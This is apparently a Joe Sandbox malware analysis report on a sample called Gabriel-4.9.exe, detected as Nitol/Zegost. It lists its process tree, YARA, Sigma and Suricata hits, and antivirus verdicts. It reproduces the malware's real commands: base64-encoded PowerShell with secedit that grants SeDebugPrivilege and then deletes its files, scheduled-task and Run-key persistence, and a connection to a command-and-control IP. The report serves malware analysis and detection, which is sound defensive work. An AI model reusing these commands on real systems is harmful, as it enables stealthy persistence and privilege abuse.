schtasks.exe (PID: 7220 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 5684 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 640 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)

cmd.exe (PID: 7552 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 4632 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)

cmd.exe (PID: 6408 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

conhost.exe (PID: 7832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 6224 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)

cmd.exe (PID: 7684 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7768 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)

cmd.exe (PID: 2960 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 3412 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)

cmd.exe (PID: 2676 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 4256 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 8168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7224 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7216 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)

cmd.exe (PID: 6868 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 6076 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)

cmd.exe (PID: 7432 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 5372 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)

cmd.exe (PID: 7588 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 2792 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)

cmd.exe (PID: 6072 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 2952 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)

cmd.exe (PID: 1404 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 6364 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)

cmd.exe (PID: 7756 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 2840 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)

cmd.exe (PID: 7884 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 5040 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)

cmd.exe (PID: 7988 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 4540 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 6524 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7180 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 3924 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 6760 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

svchost.exe (PID: 6648 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Nitol		No Attribution	https://asec.ahnlab.com/en/44504/ https://blogs.technet.microsoft.com/microsoft_blog/2012/09/13/microsoft-disrupts-the-emerging-nitol-botnet-being-spread-through-an-unsecure-supply-chain/ https://en.wikipedia.org/wiki/Nitol_botnet https://krebsonsecurity.com/tag/nitol/	https://malpedia.caad.fkie.fraunhofer.de/details/win.nitol

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\ProgramData\Microsoft\Program\ziliao.jpg	JoeSecurity_Zegost	Yara detected Zegost	Joe Security
C:\ProgramData\Microsoft\Program\ziliao.jpg	JoeSecurity_Nitol	Yara detected Nitol	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000003.2100560368.00000000054F0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Zegost	Yara detected Zegost	Joe Security
00000002.00000003.2100560368.00000000054F0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
0000001E.00000002.4680057945.0000000006250000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Zegost	Yara detected Zegost	Joe Security
0000001E.00000002.4680057945.0000000006250000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
0000001E.00000002.4680582416.0000000006650000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Zegost	Yara detected Zegost	Joe Security
0000001E.00000002.4680582416.0000000006650000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Zegost	Yara detected Zegost	Joe Security
0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
Process Memory Space: irsetup.exe PID: 3220	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
Process Memory Space: powershell.exe PID: 3472	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x2128:$b1: ::WriteAllBytes( 0x242d:$b1: ::WriteAllBytes( 0xbdca:$b1: ::WriteAllBytes( 0xeaee:$b1: ::WriteAllBytes( 0xedf3:$b1: ::WriteAllBytes( 0x6e6aa:$b1: ::WriteAllBytes( 0x6e9b2:$b1: ::WriteAllBytes( 0x6ee93:$b1: ::WriteAllBytes( 0x6f397:$b1: ::WriteAllBytes( 0x9df56:$b1: ::WriteAllBytes( 0xb5ce8:$b1: ::WriteAllBytes( 0xb5fed:$b1: ::WriteAllBytes( 0xb704a:$b1: ::WriteAllBytes( 0xbb5b8:$b1: ::WriteAllBytes( 0xc89c6:$b1: ::WriteAllBytes( 0xc952e:$b1: ::WriteAllBytes( 0xce4ce:$b1: ::WriteAllBytes( 0xd27e7:$b1: ::WriteAllBytes( 0xd933e:$b1: ::WriteAllBytes( 0xd9643:$b1: ::WriteAllBytes( 0x17436e:$b1: ::WriteAllBytes(
Process Memory Space: iusb3mon.exe PID: 4144	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
Click to see the 6 entries

Unpacked PEs

Source	Rule	Description	Author
30.2.iusb3mon.exe.6650607.4.raw.unpack	JoeSecurity_Zegost	Yara detected Zegost	Joe Security
30.2.iusb3mon.exe.6650607.4.raw.unpack	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
30.2.iusb3mon.exe.6290000.3.raw.unpack	JoeSecurity_Zegost	Yara detected Zegost	Joe Security
30.2.iusb3mon.exe.6290000.3.raw.unpack	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
30.2.iusb3mon.exe.62505bf.2.raw.unpack	JoeSecurity_Zegost	Yara detected Zegost	Joe Security
30.2.iusb3mon.exe.62505bf.2.raw.unpack	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
30.2.iusb3mon.exe.62505bf.2.unpack	JoeSecurity_Zegost	Yara detected Zegost	Joe Security
30.2.iusb3mon.exe.62505bf.2.unpack	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
2.3.irsetup.exe.54f05ff.0.raw.unpack	JoeSecurity_Zegost	Yara detected Zegost	Joe Security
2.3.irsetup.exe.54f05ff.0.raw.unpack	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
30.2.iusb3mon.exe.6290000.3.unpack	JoeSecurity_Zegost	Yara detected Zegost	Joe Security
30.2.iusb3mon.exe.6290000.3.unpack	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
30.2.iusb3mon.exe.6650607.4.unpack	JoeSecurity_Zegost	Yara detected Zegost	Joe Security
30.2.iusb3mon.exe.6650607.4.unpack	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
2.3.irsetup.exe.54f05ff.0.unpack	JoeSecurity_Zegost	Yara detected Zegost	Joe Security
2.3.irsetup.exe.54f05ff.0.unpack	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
Click to see the 11 entries

Sigma Signatures

System Summary

Sigma detected: Base64 Encoded PowerShell Command Detected

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;", CommandLine: powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe" , ParentImage: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe, ParentProcessId: 424, ParentProcessName: MTGHu7b.exe, ProcessCommandLine: powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;", ProcessId: 3472, ProcessName: powershell.exe

Sigma detected: Execution from Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe" , CommandLine: "C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe, NewProcessName: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe, OriginalFileName: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start "title" "C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1492, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe" , ProcessId: 424, ProcessName: MTGHu7b.exe

Sigma detected: Parent in Public Folder Suspicious Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;", CommandLine: powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe" , ParentImage: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe, ParentProcessId: 424, ParentProcessName: MTGHu7b.exe, ProcessCommandLine: powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;", ProcessId: 5852, ProcessName: powershell.exe

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Sigma detected: Suspicious Program Location with Network Connections

Source: Network Connection

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 118.107.45.13, DestinationIsIpv6: false, DestinationPort: 25445, EventID: 3, Image: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe, Initiated: true, ProcessId: 424, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49767

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\Program\iusb3mon.exe, EventID: 13, EventType: SetValue, Image: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe, ProcessId: 424, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Source: Registry Key set

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"msmpeng.exe\"));, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"msmpeng.exe\"));, CommandLine|base64offset|contains: ~>z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe" __IRAOFF:5572466 "__IRAFN:C:\Users\user\Desktop\Gabriel-4.9.exe" "__IRCT:0" "__IRTSS:0" "__IRSID:S-1-5-21-2246122658-3693405117-2476756634-1003", ParentImage: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe, ParentProcessId: 3220, ParentProcessName: irsetup.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"msmpeng.exe\"));, ProcessId: 5068, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6648, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-29T04:24:22.186420+0100	2022482	1	A Network Trojan was detected	192.168.2.6	49722	172.67.165.100	443	TCP
2024-12-29T04:24:28.111567+0100	2022482	1	A Network Trojan was detected	192.168.2.6	49740	172.67.165.100	80	TCP
2024-12-29T04:24:29.774416+0100	2022482	1	A Network Trojan was detected	192.168.2.6	49746	172.67.165.100	443	TCP

ET MALWARE JS/Nemucod.M.gen downloading EXE payload

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-29T04:24:22.483722+0100	2021954	1	A Network Trojan was detected	172.67.165.100	443	192.168.2.6	49722	TCP
2024-12-29T04:24:30.042298+0100	2021954	1	A Network Trojan was detected	172.67.165.100	443	192.168.2.6	49746	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen2
Source: C:\ProgramData\Program\iusb3mon.exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen2

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\Program\iusb3mon.exe	ReversingLabs: Detection: 42%
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	ReversingLabs: Detection: 42%

Multi AV Scanner detection for submitted file

Source: Gabriel-4.9.exe	Virustotal: Detection: 11%			Perma Link
Source: Gabriel-4.9.exe	ReversingLabs: Detection: 13%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.3% probability

Machine Learning detection for dropped file

Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Joe Sandbox ML: detected
